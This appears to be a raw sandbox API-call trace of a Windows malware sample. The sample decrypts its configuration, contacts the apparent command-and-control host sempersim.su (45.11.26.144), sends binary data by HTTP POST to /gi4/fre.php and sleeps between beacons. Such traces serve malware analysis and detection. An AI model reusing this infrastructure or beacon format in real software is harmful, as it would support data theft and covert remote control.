GetProcessHeap () returned 0x5b0000 [0176.000] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0176.000] GetProcessHeap () returned 0x5b0000 [0176.001] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3308 | out: hHeap=0x5b0000) returned 1 [0176.001] GetProcessHeap () returned 0x5b0000 [0176.001] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0176.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1184) returned 0x1f0 [0176.003] Sleep (dwMilliseconds=0xea60) [0176.016] GetProcessHeap () returned 0x5b0000 [0176.016] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3470 [0176.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.017] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0176.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.022] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0176.028] GetProcessHeap () returned 0x5b0000 [0176.028] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0176.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.029] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0176.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.030] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0176.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.077] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.077] GetProcessHeap () returned 0x5b0000 [0176.078] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0176.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.079] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3470, pdwDataLen=0xdfcfc | out: pbData=0x5d3470, pdwDataLen=0xdfcfc) returned 1 [0176.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.080] CryptDestroyKey (hKey=0x5bde08) returned 1 [0176.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.081] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0176.081] GetProcessHeap () returned 0x5b0000 [0176.081] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0176.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0176.082] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0176.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0176.083] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0176.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0176.084] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0176.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0176.085] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0176.085] GetProcessHeap () returned 0x5b0000 [0176.085] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0176.085] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0176.085] GetProcessHeap () returned 0x5b0000 [0176.086] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0176.086] GetProcessHeap () returned 0x5b0000 [0176.086] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0176.086] GetProcessHeap () returned 0x5b0000 [0176.086] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0176.087] GetProcessHeap () returned 0x5b0000 [0176.087] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3398 [0176.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.088] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0176.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.116] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0176.122] GetProcessHeap () returned 0x5b0000 [0176.122] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0176.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.123] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0176.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.135] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0176.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.135] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0176.136] GetProcessHeap () returned 0x5b0000 [0176.136] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0176.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.137] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3398, pdwDataLen=0xdfcfc | out: pbData=0x5d3398, pdwDataLen=0xdfcfc) returned 1 [0176.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.138] CryptDestroyKey (hKey=0x5bde08) returned 1 [0176.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0176.139] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0176.139] GetProcessHeap () returned 0x5b0000 [0176.139] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0176.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0176.202] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0176.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0176.203] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0176.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0176.204] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0176.204] GetProcessHeap () returned 0x5b0000 [0176.204] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0176.204] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdc78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0176.206] GetProcessHeap () returned 0x5b0000 [0176.206] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca950 [0176.206] socket (af=2, type=1, protocol=6) returned 0x1fc [0176.206] connect (s=0x1fc, name=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0176.281] FreeAddrInfoW (pAddrInfo=0x5cdc78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf380*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0176.281] GetProcessHeap () returned 0x5b0000 [0176.281] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0176.281] GetProcessHeap () returned 0x5b0000 [0176.281] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0176.281] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0176.282] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0176.282] GetProcessHeap () returned 0x5b0000 [0176.282] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0176.282] GetProcessHeap () returned 0x5b0000 [0176.283] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0176.283] GetProcessHeap () returned 0x5b0000 [0176.283] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2fa8 [0176.283] GetProcessHeap () returned 0x5b0000 [0176.283] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0176.284] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0176.285] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0176.285] GetProcessHeap () returned 0x5b0000 [0176.285] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0176.285] GetProcessHeap () returned 0x5b0000 [0176.285] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0176.285] send (s=0x1fc, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0176.286] send (s=0x1fc, buf=0x5d1e18*, len=159, flags=0) returned 159 [0176.286] GetProcessHeap () returned 0x5b0000 [0176.286] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0176.286] recv (in: s=0x1fc, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0177.945] GetProcessHeap () returned 0x5b0000 [0177.946] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0177.947] GetProcessHeap () returned 0x5b0000 [0177.947] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0177.947] GetProcessHeap () returned 0x5b0000 [0177.947] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0177.947] GetProcessHeap () returned 0x5b0000 [0177.948] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0177.948] closesocket (s=0x1fc) returned 0 [0177.949] GetProcessHeap () returned 0x5b0000 [0177.949] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca950 | out: hHeap=0x5b0000) returned 1 [0177.949] GetProcessHeap () returned 0x5b0000 [0177.949] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0177.949] GetProcessHeap () returned 0x5b0000 [0177.949] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0177.949] GetProcessHeap () returned 0x5b0000 [0177.950] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0177.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x11a8) returned 0x1fc [0177.965] Sleep (dwMilliseconds=0xea60) [0177.969] GetProcessHeap () returned 0x5b0000 [0177.969] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3590 [0177.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0177.970] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0178.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.055] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0178.119] GetProcessHeap () returned 0x5b0000 [0178.119] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0178.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.120] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0178.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.121] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0178.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.122] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.122] GetProcessHeap () returned 0x5b0000 [0178.122] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0178.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.123] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0178.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.266] CryptDestroyKey (hKey=0x5be288) returned 1 [0178.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.267] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0178.267] GetProcessHeap () returned 0x5b0000 [0178.267] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0178.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0178.268] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0178.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0178.269] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0178.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0178.270] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0178.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0178.271] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0178.271] GetProcessHeap () returned 0x5b0000 [0178.271] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0178.271] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0178.272] GetProcessHeap () returned 0x5b0000 [0178.272] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0178.272] GetProcessHeap () returned 0x5b0000 [0178.273] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0178.273] GetProcessHeap () returned 0x5b0000 [0178.273] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0178.273] GetProcessHeap () returned 0x5b0000 [0178.273] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3398 [0178.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.277] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0178.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.285] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0178.292] GetProcessHeap () returned 0x5b0000 [0178.292] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0178.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.293] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0178.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.294] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0178.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.295] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0178.295] GetProcessHeap () returned 0x5b0000 [0178.295] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0178.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.297] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3398, pdwDataLen=0xdfcfc | out: pbData=0x5d3398, pdwDataLen=0xdfcfc) returned 1 [0178.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.298] CryptDestroyKey (hKey=0x5bde08) returned 1 [0178.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0178.299] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0178.299] GetProcessHeap () returned 0x5b0000 [0178.299] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0178.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0178.300] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0178.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0178.301] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0178.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0178.302] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0178.302] GetProcessHeap () returned 0x5b0000 [0178.302] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0178.302] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdf70*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0178.305] GetProcessHeap () returned 0x5b0000 [0178.305] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa00 [0178.305] socket (af=2, type=1, protocol=6) returned 0x2d0 [0178.305] connect (s=0x2d0, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0178.486] FreeAddrInfoW (pAddrInfo=0x5cdf70*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0178.486] GetProcessHeap () returned 0x5b0000 [0178.486] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0178.486] GetProcessHeap () returned 0x5b0000 [0178.486] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0178.487] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0178.487] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0178.487] GetProcessHeap () returned 0x5b0000 [0178.487] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0178.488] GetProcessHeap () returned 0x5b0000 [0178.488] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0178.489] GetProcessHeap () returned 0x5b0000 [0178.489] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3038 [0178.489] GetProcessHeap () returned 0x5b0000 [0178.489] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0178.490] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0178.490] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0178.491] GetProcessHeap () returned 0x5b0000 [0178.491] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0178.491] GetProcessHeap () returned 0x5b0000 [0178.491] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0178.491] send (s=0x2d0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0178.492] send (s=0x2d0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0178.492] GetProcessHeap () returned 0x5b0000 [0178.492] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0178.492] recv (in: s=0x2d0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0180.061] GetProcessHeap () returned 0x5b0000 [0180.061] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0180.062] GetProcessHeap () returned 0x5b0000 [0180.062] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0180.062] GetProcessHeap () returned 0x5b0000 [0180.063] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0180.063] GetProcessHeap () returned 0x5b0000 [0180.063] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0180.063] closesocket (s=0x2d0) returned 0 [0180.064] GetProcessHeap () returned 0x5b0000 [0180.064] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa00 | out: hHeap=0x5b0000) returned 1 [0180.064] GetProcessHeap () returned 0x5b0000 [0180.065] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0180.065] GetProcessHeap () returned 0x5b0000 [0180.065] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0180.065] GetProcessHeap () returned 0x5b0000 [0180.065] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0180.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x11a0) returned 0x2d0 [0180.068] Sleep (dwMilliseconds=0xea60) [0180.080] GetProcessHeap () returned 0x5b0000 [0180.080] RtlAllocateHeap (HeapHandle=0x5b0000, 